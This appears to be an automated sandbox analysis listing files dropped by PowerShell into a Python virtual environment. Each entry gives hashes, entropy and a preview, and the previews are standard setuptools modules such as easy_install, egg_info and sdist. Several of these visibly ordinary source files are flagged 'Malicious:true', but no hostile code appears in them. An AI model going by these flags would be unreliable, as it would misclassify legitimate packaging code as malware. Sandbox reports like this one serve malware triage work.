                                                                                                                                                                                                                              Preview:""".Easy Install.------------..A tool for doing automatic download/extract/build of distutils-based Python.packages. For detailed documentation, see the accompanying EasyInstall.txt.file, or visit the `EasyInstall home page`__...__ https://setuptools.pypa.io/en/latest/deprecated/easy_install.html.."""..from glob import glob.from distutils.util import get_platform.from distutils.util import convert_path, subst_vars.from distutils.errors import (. DistutilsArgError,. DistutilsOptionError,. DistutilsError,. DistutilsPlatformError,.).from distutils import log, dir_util.from distutils.command.build_scripts import first_line_re.from distutils.spawn import find_executable.from distutils.command import install.import sys.import os.from typing import Dict, List.import zipimport.import shutil.import tempfile.import zipfile.import re.import stat.import random.import textwrap.import warnings.import site.import struct.import contextlib.import subprocess.import shlex.import io.import co
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):35349
                                                                                                                                                                                                                              Entropy (8bit):4.688959981679186
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:768:OjTLt9rm+VmhsgU5317tJbJLOs3Q7gkJh0M6C87DlqCbJIs5ZFBQRkrCt4q:CtPgU57Ls1GdhgwFBQRWq
                                                                                                                                                                                                                              MD5:34374DDDB151AFD79075062D50EF7369
                                                                                                                                                                                                                              SHA1:22FC9C6FB43FBD76435EC30D26F37F5AB81D567B
                                                                                                                                                                                                                              SHA-256:8F2422AF82A771854A279F491C2E85B2D0CC50C333FAFA023DED0CD4681C548D
                                                                                                                                                                                                                              SHA-512:D06026CDCB49280C18B6D620651D916DE779F1829ECF91C8DFAEE5DD8D159BB62F7914776A8F9DECED28559825498F12EA2E47110C6ED8F9147E315B1CE9D936
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:""".Create a wheel that, when installed, will make the source package 'editable'.(add it to the interpreter's path, including metadata) per PEP 660. Replaces.'setup.py develop'..... note::. One of the mechanisms briefly mentioned in PEP 660 to implement editable installs is. to create a separated directory inside ``build`` and use a .pth file to point to that. directory. In the context of this file such directory is referred as. *auxiliary build directory* or ``auxiliary_dir``.."""..import logging.import io.import os.import shutil.import traceback.from contextlib import suppress.from enum import Enum.from inspect import cleandoc.from itertools import chain, starmap.from pathlib import Path.from tempfile import TemporaryDirectory.from typing import (. TYPE_CHECKING,. Dict,. Iterable,. Iterator,. List,. Mapping,. Optional,. Protocol,. Tuple,. TypeVar,. cast,.)..from .. import (. Command,. _normalization,. _path,. errors,. namespaces
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):26516
                                                                                                                                                                                                                              Entropy (8bit):4.46224886753942
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:EsMDMNeck0jjIvCXuyQ8YLhlmnrB7NK7tTiKQt0w40:bM+/xnIvCXuyFYLh72DE0
                                                                                                                                                                                                                              MD5:502AA84821631BD81F99AAC80740BED2
                                                                                                                                                                                                                              SHA1:22CAD7252951EA379DFEFDD20CD9DD646AFF56D2
                                                                                                                                                                                                                              SHA-256:9ADC691BABF1D75BD5E0F75AFDD149E4E1ACCDA696D3D2A46A54EAD2FE8C243E
                                                                                                                                                                                                                              SHA-512:4472CFFDC3161749FDD9723A5A039F527D80F0D4A751D0BFE94B176A93AB5B55E0EDF9057BF818498081D8909567E9F2B1A1149AFABCC0FF66F89EF8E18D5E0F
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""setuptools.command.egg_info..Create a distribution's .egg-info directory and contents"""..from distutils.filelist import FileList as _FileList.from distutils.errors import DistutilsInternalError.from distutils.util import convert_path.from distutils import log.import distutils.errors.import distutils.filelist.import functools.import os.import re.import sys.import time.import collections..from .._importlib import metadata.from .. import _entry_points, _normalization.from . import _requirestxt..from setuptools import Command.from setuptools.command.sdist import sdist.from setuptools.command.sdist import walk_revctrl.from setuptools.command.setopt import edit_config.from setuptools.command import bdist_egg.import setuptools.unicode_utils as unicode_utils.from setuptools.glob import glob..from setuptools.extern import packaging.from ..warnings import SetuptoolsDeprecationWarning...PY_MAJOR = '{}.{}'.format(*sys.version_info)...def translate_pattern(glob): # noqa: C901 # is too complex
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5779
                                                                                                                                                                                                                              Entropy (8bit):4.4562374289575395
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:Tudl57AiN+fLFEXxJVrtLgqgBmohXlkMonZ64dAy2f3Q+:8lGPDFEXxX3gMsXIAcj+
                                                                                                                                                                                                                              MD5:339F22ECFE7B565FFC7F8FE4E4B30775
                                                                                                                                                                                                                              SHA1:C40F51371E5DA4ADCBF29FC00E2517B0510F24B3
                                                                                                                                                                                                                              SHA-256:5D1C85D2B72E44BB1FB0E58F58E843D781B9F714C1E8837D75D35CAF1CF96FB4
                                                                                                                                                                                                                              SHA-512:5ECC3B40F5C4C625BB02B392F5A4A2C358FCD38620AF39033A9C51AC999E208D0861710897D31014504EA25AED09847EA0277C8777E93C706E2DFA52452BBB02
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils.errors import DistutilsArgError.import inspect.import glob.import platform.import distutils.command.install as orig.from typing import cast..import setuptools.from ..warnings import SetuptoolsDeprecationWarning, SetuptoolsWarning.from .bdist_egg import bdist_egg as bdist_egg_cls..# Prior to numpy 1.9, NumPy relies on the '_install' name, so provide it for.# now. See https://github.com/pypa/setuptools/issues/199/._install = orig.install...class install(orig.install):. """Use easy_install to install the package, w/dependencies""".. user_options = orig.install.user_options + [. ('old-and-unmanageable', None, "Try not to use this!"),. (. 'single-version-externally-managed',. None,. "used by system package builders to create 'flat' eggs",. ),. ]. boolean_options = orig.install.boolean_options + [. 'old-and-unmanageable',. 'single-version-externally-managed',. ]. new_commands = [. ('in
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2066
                                                                                                                                                                                                                              Entropy (8bit):4.462310568366701
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:q7JAQvUteGJFbLltaqWI4dAySPOMM+vUTQ0bM643xu:6MnVXaZI45SPOMa3M7u
                                                                                                                                                                                                                              MD5:682937CFEC323A4C02F40F4FC17510F1
                                                                                                                                                                                                                              SHA1:B0228172651BABB999488104DF779E3FF12237A8
                                                                                                                                                                                                                              SHA-256:CE90C30A6389B297E411E91438DEF053400114D5BED2E5D4669CE91D16147622
                                                                                                                                                                                                                              SHA-512:2A7207ED8C1CAA3A6228ADA9D5EBC1C50282CE25FBC4D6A0280155F36AC01D1E80418212A5838EE919969FFD8054401F792C68C4B07FD3ED6FF7E93758369F40
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils import log, dir_util.import os..from setuptools import Command.from setuptools import namespaces.from setuptools.archive_util import unpack_archive.from .._path import ensure_directory...class install_egg_info(namespaces.Installer, Command):. """Install an .egg-info directory for the package""".. description = "Install an .egg-info directory for the package".. user_options = [. ('install-dir=', 'd', "directory to install to"),. ].. def initialize_options(self):. self.install_dir = None.. def finalize_options(self):. self.set_undefined_options('install_lib', ('install_dir', 'install_dir')). ei_cmd = self.get_finalized_command("egg_info"). basename = f"{ei_cmd._get_egg_basename()}.egg-info". self.source = ei_cmd.egg_info. self.target = os.path.join(self.install_dir, basename). self.outputs = [].. def run(self):. self.run_command('egg_info'). if os.path.isdir(self.target) and not os.p
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3870
                                                                                                                                                                                                                              Entropy (8bit):4.383745339127301
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:ZCuXNDtnGdadLEJVzOuoyOQQtypGG7E0Hg9O8dUfW0vrY41cSeR+YOAuwmdtMji0:Z/ia2J8umtkMAg9DU+0zYUyjZp
                                                                                                                                                                                                                              MD5:EB49D2594F87E4E950C1F2F0BCD8A99A
                                                                                                                                                                                                                              SHA1:D2D59B4F2ECCD01C397AB33171C1A99B8D37A36E
                                                                                                                                                                                                                              SHA-256:814116D400AB0DC2BF32AEFF46217761494A03EF5EF93ABD01C42CECA03E8259
                                                                                                                                                                                                                              SHA-512:4CE2AA0D7C225321A1691403B5C3B2B62F1846B503E30E26E1D975DE67BDDC63EC5A5BF5B0842366740F475DF886F9CBBEA582F56207F6F5C0B652F543D26192
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import sys.from itertools import product, starmap.import distutils.command.install_lib as orig...class install_lib(orig.install_lib):. """Don't add compiled flags to filenames of non-Python files""".. def run(self):. self.build(). outfiles = self.install(). if outfiles is not None:. # always compile, in case we have any extension stubs to deal with. self.byte_compile(outfiles).. def get_exclusions(self):. """. Return a collections.Sized collections.Container of paths to be. excluded for single_version_externally_managed installations.. """. all_packages = (. pkg. for ns_pkg in self._get_SVEM_NSPs(). for pkg in self._all_packages(ns_pkg). ).. excl_specs = product(all_packages, self._gen_exclusion_paths()). return set(starmap(self._exclude_pkg_path, excl_specs)).. def _exclude_pkg_path(self, pkg, exclusion_path):. """. Giv
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2419
                                                                                                                                                                                                                              Entropy (8bit):4.365831566761476
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:VPlCAQvUUWBoCW/9aqWwmqzRJWw9/U0g+2iOM6cDQJYWkTx+vUTxH:JlCcxqaZwmqzRwk/Ng+bOM6cDQJrk5xH
                                                                                                                                                                                                                              MD5:492E4FB9223CACB43AC40E641B3BC80E
                                                                                                                                                                                                                              SHA1:9C4303C7DEC6E6234558E381FD90760A74D0533B
                                                                                                                                                                                                                              SHA-256:A6AE86390EFC7BC68012457CFABE9BF22BA5AAA9481C26A62C5732FEAC76C973
                                                                                                                                                                                                                              SHA-512:0AC04504F63981C6AE956E97BFF8B885206810EEBFDFF9CC61C737C1A9D45E31A8786BE5BF9D91BF4C94A637E195B4EE188F57884EA9B215DE911F799D9C8046
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils import log.import distutils.command.install_scripts as orig.import os.import sys..from .._path import ensure_directory...class install_scripts(orig.install_scripts):. """Do normal script install, plus any egg_info wrapper scripts""".. def initialize_options(self):. orig.install_scripts.initialize_options(self). self.no_ep = False.. def run(self):. self.run_command("egg_info"). if self.distribution.scripts:. orig.install_scripts.run(self) # run first to set up self.outfiles. else:. self.outfiles = []. if self.no_ep:. # don't install entry point scripts into .egg file!. return. self._install_ep_scripts().. def _install_ep_scripts(self):. # Delay import side-effects. from pkg_resources import Distribution, PathMetadata. from . import easy_install as ei.. ei_cmd = self.get_finalized_command("egg_info"). dist = Distribution(.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):628
                                                                                                                                                                                                                              Entropy (8bit):4.569734347992454
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:TMHdtlw+53gV8eXCSNewxCglY0kiVQxA0y:2dtlwe3grXRNpxDlYbi/T
                                                                                                                                                                                                                              MD5:0B558625CA3F941533EC9F652837753C
                                                                                                                                                                                                                              SHA1:403EE9B5C7A834A1B3905A87A4C6318E68609996
                                                                                                                                                                                                                              SHA-256:C652DB8D6AC1D35B4A0B4FA195590E2A48923DBCCC9A5D9E38FB49FEE7029DB1
                                                                                                                                                                                                                              SHA-512:956E70AF1B3DC200A70F70C04AA467522D96FC1A1ABF8928EF60BE72DF0BCBDEF50BBDCC20330EE4B5F9FCB0C7EE546849B5BE72EF9EE071475F6BBA2E405CBF
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>.<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">. <assemblyIdentity version="1.0.0.0". processorArchitecture="X86". name="%(name)s". type="win32"/>. Identify the application security requirements. -->. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">. <security>. <requestedPrivileges>. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>. </requestedPrivileges>. </security>. </trustInfo>.</assembly>.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):468
                                                                                                                                                                                                                              Entropy (8bit):4.443299016300185
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1BNJKTMegOYZ2xoqHgDcIgZmCWgHSZ8G0DllYm9/p2yWG9qH2:1BNAMegT2gQIgZ73HSCGillYO/j922
                                                                                                                                                                                                                              MD5:58E7138E8EDFA64DD5B58348C9C9141A
                                                                                                                                                                                                                              SHA1:50972F4E50B1F2A414FD028B22FDF16754B59C14
                                                                                                                                                                                                                              SHA-256:924DC3C5709BE655D3BEA9E17F0C7683AABB8B06D49A04F25D409A068A013949
                                                                                                                                                                                                                              SHA-512:81CAF02BE7B4EDB937C1FE2B15C71153CD6F98F131A8C4953B7778A5957ABF39BFBB34522862BB4DBCA935668FF67A7A6D0802199BABBBB390FA6D451760C929
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from distutils import log.import distutils.command.register as orig..from setuptools.errors import RemovedCommandError...class register(orig.register):. """Formerly used to register packages on PyPI.""".. def run(self):. msg = (. "The register command has been removed, use twine to upload ". + "instead (https://pypi.org/p/twine)". ).. self.announce("ERROR: " + msg, log.ERROR).. raise RemovedCommandError(msg).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2132
                                                                                                                                                                                                                              Entropy (8bit):4.248744999836225
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1BNMBJMfZUX6mJqne54sDK0D21VdJzR1iRoSP1i53NKzbW1iiQIEqsvh/Hmf5Mc9:GgyX6+uHxxMXdK3GbEv6/GxyzxdM/Nb
                                                                                                                                                                                                                              MD5:A23E9E71E3B7B126114127CD3FCC8447
                                                                                                                                                                                                                              SHA1:34F29EF30E1813B7A761527DCCBE1E34ED7EBCDF
                                                                                                                                                                                                                              SHA-256:3FDAB1EDD744A37884C6E6A068380CD59DABFB1ED177CEC89E05CD90296ED488
                                                                                                                                                                                                                              SHA-512:D0AD5F8AD646FA1D1E07AB3CE51D83718CD1456BB3D8560950ECF0715F2C23580258D4F7B3D03662760346C1A517AAA8DB4EC0D41473FB706D0224B52EDFAA26
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsOptionError.import os.import shutil.from typing import List..from setuptools import Command...class rotate(Command):. """Delete older distributions""".. description = "delete older distributions, keeping N newest files". user_options = [. ('match=', 'm', "patterns to match (required)"),. ('dist-dir=', 'd', "directory where the distributions are"),. ('keep=', 'k', "number of matching distributions to keep"),. ].. boolean_options: List[str] = [].. def initialize_options(self):. self.match = None. self.dist_dir = None. self.keep = None.. def finalize_options(self):. if self.match is None:. raise DistutilsOptionError(. "Must specify one or more (comma-separated) match patterns ". "(e.g. '.zip' or '.egg')". ). if self.keep is None:. raise DistutilsOpt
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):657
                                                                                                                                                                                                                              Entropy (8bit):4.243609347947281
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1i2QWDLVrxxCLpvbJqKoMqOv+Njfz6zYFrz2ZwXIEuQGsGDpZsHYjX:1VHxUAMt+NnWYtz2kbGHZ
                                                                                                                                                                                                                              MD5:5225FC6F12E272E630A01AC21F0DF3D8
                                                                                                                                                                                                                              SHA1:B9582859CD94DCE2D08B4BBD01664C9683A4C5EB
                                                                                                                                                                                                                              SHA-256:99500F31120613DF2097A7974370B65A8FAA3CE825F656C7F90FD8B1B2EEA9E8
                                                                                                                                                                                                                              SHA-512:B4191FDDEC6593790A40FB8B192D410DE4B77D02C167D408E25442975B97E1D5963767093BB48400F70A950FED522EDF642F7C147364F3D87199072D6283F682
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from setuptools.command.setopt import edit_config, option_base...class saveopts(option_base):. """Save command-line options to a file""".. description = "save supplied options to setup.cfg or other config file".. def run(self):. dist = self.distribution. settings = {}.. for cmd in dist.command_options:. if cmd == 'saveopts':. continue # don't save our own options!.. for opt, (src, val) in dist.get_option_dict(cmd).items():. if src == "command line":. settings.setdefault(cmd, {})[opt] = val.. edit_config(self.filename, settings, self.dry_run).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6811
                                                                                                                                                                                                                              Entropy (8bit):4.451057557190396
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:9cvAz+pnZV+fs7g0IP98KDWPkSLo8hLHFQp328C:S4ypn2mPkBR23
                                                                                                                                                                                                                              MD5:1E4A0826CDA2720C9678F9E0CA5CDF96
                                                                                                                                                                                                                              SHA1:B8A16B970735413A6E93A6B5A14733A6129FFAA6
                                                                                                                                                                                                                              SHA-256:C4EA7E362AD3641076B7074C07C6F1554893DEF134AA3C9906CE31C000EB544C
                                                                                                                                                                                                                              SHA-512:5C684EF348495E0475B9C6AD5F53CDF8257D5413C993B1C3766B962457951C0336D71300F466AF39C2A62655E014EF0B9718EFEA491275AE431056F6B41D2111
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils import log.import distutils.command.sdist as orig.import os.import contextlib.from itertools import chain..from .._importlib import metadata.from .build import _ORIGINAL_SUBCOMMANDS.._default_revctrl = list...def walk_revctrl(dirname=''):. """Find all files under revision control""". for ep in metadata.entry_points(group='setuptools.file_finders'):. yield from ep.load()(dirname)...class sdist(orig.sdist):. """Smart sdist that finds anything supported by revision control""".. user_options = [. ('formats=', None, "formats for source distribution (comma-separated list)"),. (. 'keep-temp',. 'k',. "keep the distribution tree around after creating " + "archive file(s)",. ),. (. 'dist-dir=',. 'd',. "directory to put the source distribution archive(s) in " "[default: dist]",. ),. (. 'owner=',. 'u',. "Owner name used when
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5018
                                                                                                                                                                                                                              Entropy (8bit):4.380768856547615
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NkvBRX/T98yXvbU3ABEF8sjGem2xpTlP6awk:U793XolGiTN6az
                                                                                                                                                                                                                              MD5:7D2CB766F54BE7923BC5761FC5F6A58F
                                                                                                                                                                                                                              SHA1:9AB6EB07C933B12AE65596F81C3884517703D410
                                                                                                                                                                                                                              SHA-256:C3FEF3EF3FC30CF36563BAD9208B2074005F643DD5C4274BADEDC476EF099681
                                                                                                                                                                                                                              SHA-512:F920CBED3C769EC9FDAD4243F8BD556D5E31E6F53F044FFD1B8F6D07F02000C0136B17D805AECDEB3CEB8E5525BE64E33A869B54E0794A92CD12912B6846E3FC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:from distutils.util import convert_path.from distutils import log.from distutils.errors import DistutilsOptionError.import distutils.import os.import configparser..from .. import Command.from ..unicode_utils import _cfg_read_utf8_with_fallback..__all__ = ['config_file', 'edit_config', 'option_base', 'setopt']...def config_file(kind="local"):. """Get the filename of the distutils, local, global, or per-user config.. `kind` must be one of "local", "global", or "user". """. if kind == 'local':. return 'setup.cfg'. if kind == 'global':. return os.path.join(os.path.dirname(distutils.__file__), 'distutils.cfg'). if kind == 'user':. dot = os.name == 'posix' and '.' or ''. return os.path.expanduser(convert_path("~/%spydistutils.cfg" % dot)). raise ValueError("config_file() type must be 'local', 'global', or 'user'", kind)...def edit_config(filename, settings, dry_run=False):. """Edit a configuration file to include `settings`.. `settings`
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8101
                                                                                                                                                                                                                              Entropy (8bit):4.366388249392739
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WU9ZJKmhAkVG7lgRGQn8GPObbZrkx+sDi8b2gz6ztGtTtTJJBg:WU9W2k7lfGIVr+DD9Bn+
                                                                                                                                                                                                                              MD5:45558DA7785DF55966D2707FDF0E10A9
                                                                                                                                                                                                                              SHA1:B84CBF8E53269043BD2F1AB14ACB386E1F49BE2F
                                                                                                                                                                                                                              SHA-256:0EE0C60AC069D888F1088F0D1D0FBBD4AB1E68DEA59F5CBE9C8C016CBAF146ED
                                                                                                                                                                                                                              SHA-512:4C3E0A171F0B725102C2199BCB1A2E5A28FFBA568B13DFB19E0B995398965E2982E7B7F66442CFDBF8BDBAA86DC51946302D202F8B3FCD1A524B9DB18A3C1EA6
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import os.import operator.import sys.import contextlib.import itertools.import unittest.from distutils.errors import DistutilsError, DistutilsOptionError.from distutils import log.from unittest import TestLoader..from pkg_resources import (. resource_listdir,. resource_exists,. normalize_path,. working_set,. evaluate_marker,. add_activation_listener,. require,.).from .._importlib import metadata.from setuptools import Command.from setuptools.extern.more_itertools import unique_everseen.from setuptools.extern.jaraco.functools import pass_none...class ScanningLoader(TestLoader):. def __init__(self):. TestLoader.__init__(self). self._visited = set().. def loadTestsFromModule(self, module, pattern=None):. """Return a suite of all tests cases contained in the given module.. If the module is a package, load tests from all the modules in it.. If the module has an ``additional_tests`` function, call it and add. the return val
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):462
                                                                                                                                                                                                                              Entropy (8bit):4.465772612419235
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:12:1BNJtNMZ20YZ2xoqHgD36mCWZ8dJDllYm9/p2yWVk9qH2:1BNJMIR2gmSC/llYO/ik922
                                                                                                                                                                                                                              MD5:DCB51BA66DBBF1DA3C745B009B011220
                                                                                                                                                                                                                              SHA1:BDA85F9DC7B71594AB2BC0F2930A70C669E27786
                                                                                                                                                                                                                              SHA-256:5D3DD81557D83C0980E6A8468347AE96E53DF1FB714545BE3F329C38330BC54B
                                                                                                                                                                                                                              SHA-512:DA048DF52450FECD76AFF463D00F421693B2F996770E682B56A5FBDB2DE77EF8A99083E1AED8487962B3127D231282788109E61499DBEFE14D435272377F76F9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from distutils import log.from distutils.command import upload as orig..from setuptools.errors import RemovedCommandError...class upload(orig.upload):. """Formerly used to upload packages to PyPI.""".. def run(self):. msg = (. "The upload command has been removed, use twine to upload ". + "instead (https://pypi.org/p/twine)". ).. self.announce("ERROR: " + msg, log.ERROR). raise RemovedCommandError(msg).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7821
                                                                                                                                                                                                                              Entropy (8bit):4.4549162011416135
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:omRen72Q/Tx+I8z5hf/QGg0Be3AVIJSAqcheluUq5+6kfr5lTpQlPctf3C:omR0iQ/4XRVIJniss15LRC
                                                                                                                                                                                                                              MD5:1DD188CDF1725AF69EC2EC27D788D9C5
                                                                                                                                                                                                                              SHA1:5A07B2E7412B0E8266F637D5BD38CD6BAC942586
                                                                                                                                                                                                                              SHA-256:E7323A76A0DD1A5D9E912B8CAB521C4516E1FBD97E8AF7DBE0CABE516334AE3E
                                                                                                                                                                                                                              SHA-512:3248226530E5BAE2550D42F88EC4E5FA646784E4376BFE8C4ACBF1BB8D50D6283C10BB8CA036E25E8DD8BA409F15150BBBA76BAAF61B22A68AED1F7C7B85C28B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:"""upload_docs..Implements a Distutils 'upload_docs' subcommand (upload documentation to.sites other than PyPi such as devpi).."""..from base64 import standard_b64encode.from distutils import log.from distutils.errors import DistutilsOptionError.import os.import zipfile.import tempfile.import shutil.import itertools.import functools.import http.client.import urllib.parse..from .._importlib import metadata.from ..warnings import SetuptoolsDeprecationWarning..from .upload import upload...def _encode(s):. return s.encode('utf-8', 'surrogateescape')...class upload_docs(upload):. # override the default repository as upload_docs isn't. # supported by Warehouse (and won't be).. DEFAULT_REPOSITORY = 'https://pypi.python.org/pypi/'.. description = 'Upload documentation to sites other than PyPi such as devpi'.. user_options = [. (. 'repository=',. 'r',. "url of repository [default: %s]" % upload.DEFAULT_REPOSITORY,. ),. ('sh
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):172
                                                                                                                                                                                                                              Entropy (8bit):4.558808196821528
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:o1iclllVO8l4/8uFK5VcK85kdVWrzI0Q7RYKdIUcRwIaQHtgem/l:3cl/Vne/8uw52KNdAr8p7lKZ6Iaatgei
                                                                                                                                                                                                                              MD5:626DECA5A0FBED4CDCD38B04341051B4
                                                                                                                                                                                                                              SHA1:916AE1F34D26C8549D40117DABFA8C8C0DFDB8CE
                                                                                                                                                                                                                              SHA-256:34084075F2F6C37AF0017460F2128CB82CCF9875E0921CB04CBEE66237D4F4C3
                                                                                                                                                                                                                              SHA-512:343C4723CFDF1EC32622DF80EF55F44C3C50970247C8377297E5CE07F1BC9CD0B6F20CC872C56A8DB4CDF1DACE38626A6C06FF6D503AD5D2E7EC6E64A11DEFBB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf................................y.).N..r..........KC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/compat/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):358
                                                                                                                                                                                                                              Entropy (8bit):5.123308661169673
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:Oasc2Flr4DUgfHlt2FvlycvUv46l4mw52KNdAr8p7lK/QaptmuK3E1:zsTlrmUEGFBMA6eUKNxVlgQajnK3Y
                                                                                                                                                                                                                              MD5:14390CF6E813971172BCAACB7485DCD9
                                                                                                                                                                                                                              SHA1:A1F7C43545176B2A4822F4FD465767426047D738
                                                                                                                                                                                                                              SHA-256:1B614F44D8E4E85E8F8ECC6E75D0D84A3C259F43024C77D8F2B9F60FED53EF99
                                                                                                                                                                                                                              SHA-512:F327F6B4193FF37AA51C4214412EF1E375C1057F821F45BDDE574B10A469F85E5B2548825F152F51CC58834017E1EA6A82356F9A6B1B79B91969BDD1CAA9F460
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:........x.Vf..........................F.....d.d.l.Z.d.g.Z.e.j...................d.k\..r.d.d.l.Z.y.d.d.l.m.Z...y.)......N..tomllib)...........)...tomli)...sys..__all__..version_infor......setuptools.externr............HC:\Users\xbov\Desktop\pyops\Lib\site-packages\setuptools/compat/py310.py..<module>r........s'.................+..............w........2r....
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):802
                                                                                                                                                                                                                              Entropy (8bit):5.01990079325188
